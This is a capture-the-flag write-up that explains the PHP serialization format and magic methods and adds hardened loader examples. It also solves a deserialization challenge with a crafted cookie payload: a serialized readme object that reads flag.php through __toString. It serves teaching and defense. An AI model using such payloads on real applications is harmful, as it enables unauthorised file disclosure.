unserialize() - Deserialization vulnerability

What is serialization?

Serialization (serialize) is the process of converting an object's state information into a form that can be stored or transmitted. During serialization the object writes its current state to temporary or persistent storage. Later, the object can be recreated by reading its state back from storage and deserializing it.
[Save the state information as a string]

Put simply: serialize() converts PHP objects, classes, arrays, variables, anonymous functions and so on into a string, so that they can easily be stored in a database or a file.


What is deserialization?

Serialization converts an object's state information into a string and stores it; deserialization takes that stored state information back out and uses it again (converting it back into an object or some other value).
[Convert the string back into state information]

Let's first get to know a few functions and constants.

__FILE__

This is a magic constant that expands to the full path of the current file.

show_source(__FILE__)

This outputs the source code of the current file with syntax highlighting (show_source() is an alias of highlight_file()). CTF challenges use it a lot to expose their own code.

serialize()

Converts an object into a string.
After creating an object in PHP, you can call serialize() to turn it into a string; this preserves the object's values so they can be transferred and reused later.

<?php
show_source(__FILE__);
class chybeta{
    var $test = '123';
}
$class1 = new chybeta;
$class1_ser = serialize($class1);
echo "<hr>";
print_r($class1_ser);
?>

O:7:"chybeta":1:{s:4:"test";s:3:"123";}

What this string means: variable type; class-name length; class name; number of properties
{
    property type; property-name length; property name; property-value type; property-value length; property-value content
}
O         means an object
7         the class name is 7 characters long
chybeta   the class name
1         the object has only one property
s         means a string
4         the length of the string test
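The format breakdown above is easier to trust once you have decoded a string by hand. The following is an added example, not code from the original post: a small reader (the class name SerialReader and its helper names are my own) that walks the same tokens (O, a, s, i, b, N) and turns a serialized string into plain arrays without ever calling unserialize(). Because no class is instantiated, no magic method can run, which makes it a safe way to inspect an untrusted cookie and list the classes it would create.

```php
<?php
// Added example, not code from the original post: a reader for the PHP
// serialization format described above. It decodes a serialized string
// into plain arrays WITHOUT calling unserialize(), so no class is ever
// instantiated and no magic method can run. Supported tokens: N, b, i, s, a, O.
final class SerialReader
{
    private string $data;
    private int $pos = 0;
    /** @var string[] class names seen in O: tokens, in order */
    public array $classes = [];

    private function __construct(string $data)
    {
        $this->data = $data;
    }

    /** Returns ['value' => decoded data, 'classes' => [...]] or throws. */
    public static function decode(string $data): array
    {
        $r = new self($data);
        $value = $r->readValue();
        if ($r->pos !== strlen($data)) {
            throw new RuntimeException("trailing data at offset {$r->pos}");
        }
        return ['value' => $value, 'classes' => $r->classes];
    }

    // Consume an expected literal such as ':' or '{', or fail.
    private function expect(string $lit): void
    {
        if (substr($this->data, $this->pos, strlen($lit)) !== $lit) {
            throw new RuntimeException("expected '$lit' at offset {$this->pos}");
        }
        $this->pos += strlen($lit);
    }

    // Read the text up to the terminator (a length or a number) and consume it.
    private function readUntil(string $term): string
    {
        $end = strpos($this->data, $term, $this->pos);
        if ($end === false) {
            throw new RuntimeException("missing '$term' after offset {$this->pos}");
        }
        $tok = substr($this->data, $this->pos, $end - $this->pos);
        $this->pos = $end + 1;
        return $tok;
    }

    // <len>:"<bytes>" -- the length counts bytes, which is why a wrong length
    // (after editing a payload by hand) makes unserialize() fail.
    private function readString(): string
    {
        $len = (int) $this->readUntil(':');
        $this->expect('"');
        $s = substr($this->data, $this->pos, $len);
        if (strlen($s) !== $len) {
            throw new RuntimeException('truncated string');
        }
        $this->pos += $len;
        $this->expect('"');
        return $s;
    }

    private function readValue(): mixed
    {
        $type = $this->data[$this->pos] ?? '';
        $this->pos++;
        switch ($type) {
            case 'N': $this->expect(';'); return null;                          // N;
            case 'b': $this->expect(':'); return $this->readUntil(';') === '1'; // b:1;
            case 'i': $this->expect(':'); return (int) $this->readUntil(';');   // i:42;
            case 's':                                                           // s:3:"abc";
                $this->expect(':');
                $s = $this->readString();
                $this->expect(';');
                return $s;
            case 'a':                                                           // a:<count>:{...}
                $this->expect(':');
                return $this->readMembers((int) $this->readUntil(':'));
            case 'O':                                                           // O:<len>:"<class>":<count>:{...}
                $this->expect(':');
                $class = $this->readString();
                $this->classes[] = $class;
                $this->expect(':');
                $props = $this->readMembers((int) $this->readUntil(':'));
                return ['__class' => $class, 'props' => $props];
            default:
                throw new RuntimeException("unknown type '$type' at offset " . ($this->pos - 1));
        }
    }

    // {key;value key;value ...} with exactly $n pairs (array entries or object properties).
    private function readMembers(int $n): array
    {
        $this->expect('{');
        $out = [];
        for ($i = 0; $i < $n; $i++) {
            $key = $this->readValue();
            $out[$key] = $this->readValue();
        }
        $this->expect('}');
        return $out;
    }
}

// Walk the string from the post, then the challenge payload discussed further down.
print_r(SerialReader::decode('O:7:"chybeta":1:{s:4:"test";s:3:"123";}'));
print_r(SerialReader::decode('a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}'));
```

The 'classes' list is the part a defender cares about: if data that should only ever contain strings and arrays yields a non-empty class list, it should be rejected before it ever reaches unserialize().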

unserialize()

This function does the opposite of serialize(): it converts the string back into an object.

print_r()

Prints non-string values such as arrays and objects in a human-readable form.


Magic method

PHP has a group of special methods called "magic methods" (magic functions); here we focus on a few of them:

__construct(): called automatically when an object is created with new, but NOT called during unserialize(). (constructor)
__destruct(): called automatically when an object is destroyed. (destructor)
__wakeup(): as mentioned above, called automatically during unserialize().
There is also __toString(): whenever echo is used to print an object, __toString() is called automatically.
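To see which of these methods actually fires at each step, here is an added example (not code from the original post; the class name Demo is my own). Running it from the command line prints one line per magic-method call, so you can confirm that unserialize() skips the constructor and goes through __wakeup() instead, that echo triggers __toString(), and that __destruct() runs when the last reference disappears.

```php
<?php
// Added example, not code from the original post: which magic method runs
// at each step of an object's life. Run with `php demo.php` and read the log.
class Demo
{
    public $name;

    // Runs on `new`, never on unserialize().
    public function __construct($name)
    {
        $this->name = $name;
        echo "__construct({$name})\n";
    }

    // Runs on unserialize() in place of the constructor.
    public function __wakeup()
    {
        echo "__wakeup() for {$this->name}\n";
    }

    // Runs whenever the object is turned into a string, e.g. by echo.
    public function __toString(): string
    {
        echo "__toString() for {$this->name}\n";
        return "Demo<{$this->name}>";
    }

    // Runs when the last reference to the object goes away.
    public function __destruct()
    {
        echo "__destruct() for {$this->name}\n";
    }
}

echo "1) new:\n";
$a = new Demo('a');            // fires __construct

echo "2) serialize:\n";
$s = serialize($a);            // no magic method fires (no __sleep defined)
echo $s, "\n";

echo "3) unserialize:\n";
$b = unserialize($s);          // fires __wakeup, NOT __construct
$b->name = 'b';

echo "4) echo object:\n";
echo $b, "\n";                 // fires __toString

echo "5) drop references:\n";
$a = null;                     // fires __destruct for a
$b = null;                     // fires __destruct for b
echo "done\n";
```

The security-relevant point is step 3: an attacker who controls the serialized string gets an object of any class the application can load, with property values of their choosing and no constructor validation, and any of the later steps (echo, destruction) then runs that class's code on those values.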

Now let's go straight to the challenge.

We find that as long as the source parameter is supplied, execution enters the first if branch,
which does echo $s; that call invokes the __toString() method and displays the contents of Readme.txt.

Looking further down, in addition to the next if branch there is an unserialize() function.
However, there is no echo;
we continue to look down and find


There is a

<?php foreach($todos as $todo):?>
    <li><?=$todo?></li>
<?php endforeach;?>

and the <?=$todo?> short tag is in fact equivalent to echo $todo. Our second if branch assigns $todos, and it just so happens that this foreach() iterates over that same $todos and echoes every element of it.

We may not know what foreach() does; a quick search shows that it is simply a convenient way to iterate over an array.

After reading all of the code, the question is: can we control $todos in the second if branch, so that what gets deserialized is our own object, and make it read the file we want it to read?

We first build the serialized string: we write a small script with the modified class and print the result.

<?php
class readme{
    public $source;   // declared so the property is not a dynamic one (deprecated in PHP 8.2)
    public function __toString()
    {
        return highlight_file('Readme.txt', true).highlight_file($this->source, true);
    }
}
if(isset($_GET['source'])){
    $s = new readme();
    $s->source = 'flag.php';
    $s = [$s];            // wrap in an array so foreach($todos as $todo) echoes it
    echo serialize($s);
}
?>
    


a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}


e2d4f7dcc43ee1db7f69e76303d0105c
Because the source code applies md5() once together with a substr(0,15), we can set the value of $c in the cookie parameter:
$c = e2d4f7dcc43ee1db7f69e76303d0105ca:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}

Because cookies are transferred URL-encoded, we encode the value and then send it as
todos=e2d4f7dcc43ee1db7f69e76303d0105ca%3a1%3a%7bi%3a0%3bO%3a6%3a%22readme%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a8%3a%22flag.php%22%3b%7d%7d
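The root cause in the walkthrough is that cookie data is handed to unserialize() and the result is then echoed by the template. As an added example (not code from the original post or the challenge), here is that pattern beside two hardened versions. The readme class and the payload string are taken from the post; the function names loadTodosUnsafe, loadTodosSafe and loadTodosJson and the "normal" sample cookie are my own assumptions, and the md5 prefix check from the challenge is not reproduced.

```php
<?php
// Added example, not code from the original post: the vulnerable $todos
// pattern beside a hardened form. Only the hardened functions are executed.
class readme
{
    public $source;
    public function __toString()
    {
        return highlight_file('Readme.txt', true) . highlight_file($this->source, true);
    }
}

// Vulnerable: every O: token in the cookie is instantiated, and the
// template's <?=$todo?> later turns each item into a string, which runs
// readme::__toString() with an attacker-chosen $source.
function loadTodosUnsafe(string $cookie): array
{
    $todos = unserialize($cookie);
    return is_array($todos) ? $todos : [];
}

// Hardened: refuse to build objects at all. With allowed_classes => false
// (PHP >= 7.0) every O: token becomes __PHP_Incomplete_Class, which cannot
// be echoed, so we additionally keep only plain strings for the template.
function loadTodosSafe(string $cookie): array
{
    $todos = @unserialize($cookie, ['allowed_classes' => false]);
    if (!is_array($todos)) {
        return [];
    }
    return array_values(array_filter($todos, 'is_string'));
}

// Better still: a format that cannot carry objects. JSON is enough for a todo list.
function loadTodosJson(string $cookie): array
{
    $todos = json_decode($cookie, true);
    if (!is_array($todos)) {
        return [];
    }
    return array_values(array_filter($todos, 'is_string'));
}

// Constructed inputs: the serialized payload from the post and a harmless list.
$payload = 'a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}';
$normal  = 'a:2:{i:0;s:4:"milk";i:1;s:5:"bread";}';

foreach (['payload' => $payload, 'normal' => $normal] as $label => $cookie) {
    $items = loadTodosSafe($cookie);
    echo $label, ': ', count($items), " item(s) survive hardening\n";
    foreach ($items as $todo) {
        // The template echoed $todo raw; escaping it closes the XSS path as well.
        echo "  - ", htmlspecialchars($todo, ENT_QUOTES, 'UTF-8'), "\n";
    }
}
```

With loadTodosSafe the payload from the post yields an empty list (its only element is an incomplete-class object and is dropped), while the harmless list yields its two strings. The JSON variant is the one to prefer in new code: it never touches unserialize(), so the magic-method chain described earlier cannot start.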


Source: blog.csdn.net/weixin_43264067/article/details/106216548